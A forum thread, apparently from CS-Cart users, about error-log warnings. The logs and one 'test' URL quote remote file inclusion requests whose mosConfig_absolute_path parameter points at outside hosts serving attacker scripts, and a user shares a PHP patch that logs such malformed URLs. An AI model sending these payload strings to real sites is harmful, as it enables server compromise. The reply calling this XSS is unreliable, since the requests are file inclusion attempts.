Anybody have a clue what all this means? Almost looks like I’ve been hijacked.
I have about 70 lines of stuff like this:
[28-Feb-2010 09:01:10] PHP Warning: parse_url(//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1?) [function.parse-url]: Unable to parse URL in /home/username/public_html/addons/seo/func.php on line 702
[28-Feb-2010 09:01:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/username/public_html/addons/seo/func.php:702) in /home/username/public_html/core/fn.init.php on line 400
and:
[01-Mar-2010 22:41:44] PHP Warning: parse_url(//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???) [function.parse-url]: Unable to parse URL in /home/username/public_html/addons/seo/func.php on line 702
[01-Mar-2010 22:41:44] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/username/public_html/addons/seo/func.php:702) in /home/username/public_html/core/fn.init.php on line 400
[01-Mar-2010 15:41:44] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/username/public_html/addons/seo/func.php:702) in /home/username/public_html/core/fn.control.php on line 455
I went to some of these links and they’re all in chinese.
Hacking in progress…xss attack
Script Kiddies in action.
More here:
[url]http://en.wikipedia.org/wiki/Cross-site_scripting[/url]
Check with your host to see if they have upgraded or made any changes to server software.
I was getting error’s like that, not as many as you, it was down to the host making changes to server software.
next time try not to go to these links
especially if you are on Windows.
Those links include exploits that inject some stuff to your computer if you are not properly protected. ^^
Next, I’ve posted and raised this issue with helpdesk before already.
Same error logs.
I’ve went through the code and realize that these error logs are being output because cscart code use the PHP function parse_url to parse the URLs. And since these URLs are malformed, PHP function will generate an error warning to inform you that these urls are not parsable.
It is fine for your site, since the URLs are not parsable by the script, and will be discarded.
But if you are like me, who hates to have the error log being generated each and every time this kind of URLs are being applied to your site. And yet, would like to monitor the frequency of such visits. You can apply my code as below. Tested and working.
The problem of PHP warning of injection URLs creating error log, I’ve stop the generation of the lines within error.log due to the e_warning message at line 703 at seo/func.php using parse_url, which will emit warning for malformed urls. This is the code:
if(($parse_result = @parse_url($_SERVER['REQUEST_URI'])) === false) {
//Error has been caught here
file_put_contents("parse_errors.log", date('Y-m-d H:i:s').": parse_url() return FALSE on \"".$_SERVER['REQUEST_URI']."\" at ". __LINE__ ." in ". __FILE__ ." \n", FILE_APPEND);
}
else $url_pattern = $parse_result;
You can try it with the following url
demo.cs-cart.com//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.koreadefence.net/data/.psy/id1.txt?
And it will work with any malformed urls.
I do not think it is wise to just suppress the warning, and by handling it specifically via a custom log file, it shows that extra care is taken by the script to handle possible URL injection attacks.
To add on, this solution was shared with cscart helpdesk on 5th Feb. Their reply is “Thanks for the information we will analyze it.”
Hope it helps.
Wow, thanks nodame! Great catch… and fix.
Two questions:
Are these just random drive by attempts?
And, where exactly do I put that code?
I just moved to a new host when this started, I’m wondering about their firewall situation.
Thanks
James
[quote name=‘ePlanetDesign’]Wow, thanks nodame! Great catch… and fix.
Two questions:
Are these just random drive by attempts?
And, where exactly do I put that code?
I just moved to a new host when this started, I’m wondering about their firewall situation.
Thanks
James[/QUOTE]
Hi James,
Most probably it is random. Or if your URL was using virtuemart previously, it might have indexed by these crawlers before.
It should be safe for cscart, since it is injection via URL, trying to exploit some vulnerabilities of virtuemart code. Just that I did not like that the cscart script did not properly handle such malformed URL possibilities. (Although I will hate it if they purely do a @ to suppress it. Proper exception and error catching handling should be done. My way is not really proper but it works as a quick fix. )
Sorry that I’ve left out where to put the code. ^^
In addons/seo/func.php, look for the code:
$url_pattern = parse_url($_SERVER['REQUEST_URI']);
$rewrite_rules = fn_get_rewrite_rules();
replaced it with
if(($parse_result = @parse_url($_SERVER['REQUEST_URI'])) === false) {
//Error has been caught here
file_put_contents("parse_errors.log", date('Y-m-d H:i:s').": parse_url() return FALSE on \"".$_SERVER['REQUEST_URI']."\" at ". __LINE__ ." in ". __FILE__ ." \n", FILE_APPEND);
}
else $url_pattern = $parse_result;
$rewrite_rules = fn_get_rewrite_rules();
Finally got a chance to try this and works like a charm… and keeps those errors out of the server error_log files and out of the cPanel errors!
Be nice to expand on it to show the IP, and then we could block those that are hack attempts. Of course if they are spoofing or regularly changing IP’s that could be a full time job, hahaha.
Again, great find and great fix! Thank You
James